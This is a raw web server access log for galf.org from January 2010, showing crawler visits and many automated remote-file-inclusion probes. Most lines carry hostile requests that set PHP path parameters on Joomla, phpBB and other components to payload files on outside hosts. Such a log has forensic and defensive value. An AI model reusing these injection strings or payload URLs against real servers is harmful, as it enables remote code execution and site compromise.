212.96.168.169 - - [03/Jan/2010:16:08:30 -0800] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.96.168.169 - - [03/Jan/2010:16:08:30 -0800] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:16:09:34 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:16:09:34 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:16:09:34 -0800] "GET /logs/access_090706.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:16:09:35 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:16:09:35 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:16:09:35 -0800] "GET /logs/access_090706.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:16:09:38 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:16:09:38 -0800] "GET /logs/access_090706.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:16:09:38 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:16:11:44 -0800] "GET /logs/access_090629.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:16:11:44 -0800] "GET /logs/access_090629.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:16:12:06 -0800] "GET /logs/access_090629.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.213.195 - - [03/Jan/2010:16:22:10 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "galf.org"
211.115.213.195 - - [03/Jan/2010:16:22:10 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "galf.org"
211.115.213.195 - - [03/Jan/2010:16:22:13 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
211.115.213.195 - - [03/Jan/2010:16:22:14 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
208.80.193.41 - - [03/Jan/2010:16:28:24 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=47&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; E-nrgyPlus; dial; .NET CLR 1.0.3705)" "www.galf.org"
124.115.1.59 - - [03/Jan/2010:16:29:06 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:16:30:02 -0800] "GET /logs/access_091228.log/components/com_performs/performs.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:16:30:18 -0800] "GET /logs/access_091221.log/components/com_performs/performs.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.29 - - [03/Jan/2010:16:31:40 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=45&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; HbTools 4.8.2; ZangoToolbar 4.8.2; yplus 5.1.02b)" "www.galf.org"
68.28.59.113 - - [03/Jan/2010:16:32:49 -0800] "GET / HTTP/1.1" 200 1048 "http://www.google.com/m?client=ms-hms-sprint-us&channel=portal&q=www+lesbianas+us" "Mozilla/4.0 (BREW 3.1.5; U; en-us; Sanyo; NetFront/3.5.1/AMB) Sprint SCP-3810" "www.galf.org"
68.28.59.113 - - [03/Jan/2010:16:32:53 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (BREW 3.1.5; U; en-us; Sanyo; NetFront/3.5.1/AMB) Sprint SCP-3810" "www.galf.org"
68.28.59.113 - - [03/Jan/2010:16:33:11 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (BREW 3.1.5; U; en-us; Sanyo; NetFront/3.5.1/AMB) Sprint SCP-3810" "www.galf.org"
68.28.59.113 - - [03/Jan/2010:16:33:15 -0800] "GET /tmp/ HTTP/1.1" 200 520 "http://www.galf.org/" "Mozilla/4.0 (BREW 3.1.5; U; en-us; Sanyo; NetFront/3.5.1/AMB) Sprint SCP-3810" "www.galf.org"
68.28.59.113 - - [03/Jan/2010:16:33:18 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (BREW 3.1.5; U; en-us; Sanyo; NetFront/3.5.1/AMB) Sprint SCP-3810" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:16:34:46 -0800] "GET /logs/access_091228.log/components/com_performs/performs.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:16:34:58 -0800] "GET /logs/access_091221.log/components/com_performs/performs.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:16:56:37 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:16:58:06 -0800] "GET /!rfihttp://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:16:58:06 -0800] "GET /logs/!rfihttp://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:16:59:28 -0800] "GET /logs/access.log//skins/advanced/advanced1.php?pluginpath[0]=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:16:59:28 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:16:59:28 -0800] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:17:00:06 -0800] "GET /logs/access_091102.log//skins/advanced/advanced1.php?pluginpath[0]=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:17:09:00 -0800] "GET /logs/access_091102.log%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:17:10:01 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:17:10:01 -0800] "GET /logs/access_090713.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:17:10:01 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:17:10:11 -0800] "GET /logs/access_090914.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
87.250.252.242 - - [03/Jan/2010:17:10:44 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
213.198.4.237 - - [03/Jan/2010:17:13:26 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://phoenix-model.com/zfxid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.198.4.237 - - [03/Jan/2010:17:13:26 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://phoenix-model.com/zfxid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.198.4.237 - - [03/Jan/2010:17:13:27 -0800] "GET /skin/zero_vote/error.php?dir=http://phoenix-model.com/zfxid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:17:13:49 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:17:13:49 -0800] "GET /logs/access_091228.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:17:13:52 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:17:15:05 -0800] "GET /logs/access_091228.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.54 - - [03/Jan/2010:17:22:25 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=37&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; Maxthon 2.0)" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:17:29:00 -0800] "GET /logs/access_091109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:17:29:00 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:17:29:00 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:17:29:31 -0800] "GET /logs/access_091026.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:17:30:23 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:17:30:23 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:17:30:26 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.26.185 - - [03/Jan/2010:17:32:16 -0800] "GET /logs/access_091123.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://transportadoracrepaldi.com.br/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.26.185 - - [03/Jan/2010:17:32:17 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://transportadoracrepaldi.com.br/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.26.185 - - [03/Jan/2010:17:32:17 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://transportadoracrepaldi.com.br/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.26.185 - - [03/Jan/2010:17:32:51 -0800] "GET /logs/access_090803.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://transportadoracrepaldi.com.br/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.26.185 - - [03/Jan/2010:17:34:29 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://transportadoracrepaldi.com.br/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:17:34:51 -0800] "GET /logs/access_090525.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.198.4.237 - - [03/Jan/2010:17:35:18 -0800] "GET /logs/access_090601.log%20%20//skin/zero_vote/error.php?dir=http://phoenix-model.com/zfxid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:17:35:46 -0800] "GET /logs/access_090921.log%20%20/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:17:35:46 -0800] "GET /common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:17:35:46 -0800] "GET /logs/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:17:36:02 -0800] "GET /common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:17:36:02 -0800] "GET /logs/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:17:36:02 -0800] "GET /logs/access_090921.log%20%20/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.26.185 - - [03/Jan/2010:17:40:05 -0800] "GET /logs//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://transportadoracrepaldi.com.br/bot_site.gif? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.26.185 - - [03/Jan/2010:17:40:05 -0800] "GET /libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://transportadoracrepaldi.com.br/bot_site.gif? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:17:42:17 -0800] "GET /logs/access_090914.log%20%20/?INCLUDE_FOLDER=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:17:42:17 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:17:42:17 -0800] "GET /?INCLUDE_FOLDER=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:17:42:29 -0800] "GET /logs/access_091207.log%20%20/?INCLUDE_FOLDER=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [03/Jan/2010:17:42:43 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.37.161 - - [03/Jan/2010:17:42:48 -0800] "GET /logs/access_090907.log HTTP/1.0" 200 3152962 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
210.205.6.233 - - [03/Jan/2010:17:44:04 -0800] "GET /logs/access.log/?s=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [03/Jan/2010:17:44:04 -0800] "GET /?s=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [03/Jan/2010:17:44:04 -0800] "GET /logs/?s=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
61.6.163.21 - - [03/Jan/2010:17:46:36 -0800] "GET /logs/access.log HTTP/1.1" 200 17563 "-" "Mozilla/8.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:17:53:05 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:17:53:05 -0800] "GET /logs/access_091116.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:17:53:05 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:17:53:44 -0800] "GET /logs/access_090914.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [03/Jan/2010:17:54:06 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [03/Jan/2010:17:54:06 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [03/Jan/2010:17:54:06 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:17:54:23 -0800] "GET /logs/access_091116.log%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:17:54:40 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:17:58:34 -0800] "GET /logs/access_091221.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:17:58:34 -0800] "GET /logs/access_090810.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.26.185 - - [03/Jan/2010:17:59:18 -0800] "GET /logs/access_091123.log//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://transportadoracrepaldi.com.br/bot_site.gif? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:18:01:42 -0800] "GET /logs/access_090914.log/?INCLUDE_FOLDER=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:18:01:52 -0800] "GET /logs/access_091207.log/?INCLUDE_FOLDER=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.198.4.237 - - [03/Jan/2010:18:02:06 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://phoenix-model.com/zfxid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:03:25 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:03:25 -0800] "GET /logs/access_090629.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:03:25 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:03:32 -0800] "GET /logs/access_090803.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:03:54 -0800] "GET /show_news.php?cutepath=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:03:54 -0800] "GET /logs/access_090706.log/show_news.php?cutepath=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:03:54 -0800] "GET /logs/show_news.php?cutepath=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.198.4.237 - - [03/Jan/2010:18:04:31 -0800] "GET /logs/access_090824.log//skin/zero_vote/error.php?dir=http://phoenix-model.com/zfxid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:18:11:43 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
170.210.192.78 - - [03/Jan/2010:18:11:43 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
170.210.192.78 - - [03/Jan/2010:18:11:43 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.250.252.242 - - [03/Jan/2010:18:15:56 -0800] "GET /logs/access_091012.log HTTP/1.1" 200 7194106 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:18:16:31 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:18:16:31 -0800] "GET /?sourcedir=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:18:16:31 -0800] "GET /logs/?sourcedir=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:18:17:17 -0800] "GET /logs/access_091109.log////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [03/Jan/2010:18:17:24 -0800] "GET /logs/access_091026.log////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.32 - - [03/Jan/2010:18:18:10 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=69&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Ringo; FunWebProducts; .NET CLR 1.1.4322; HbTools 4.8.2)" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:18:22:03 -0800] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:18:22:03 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
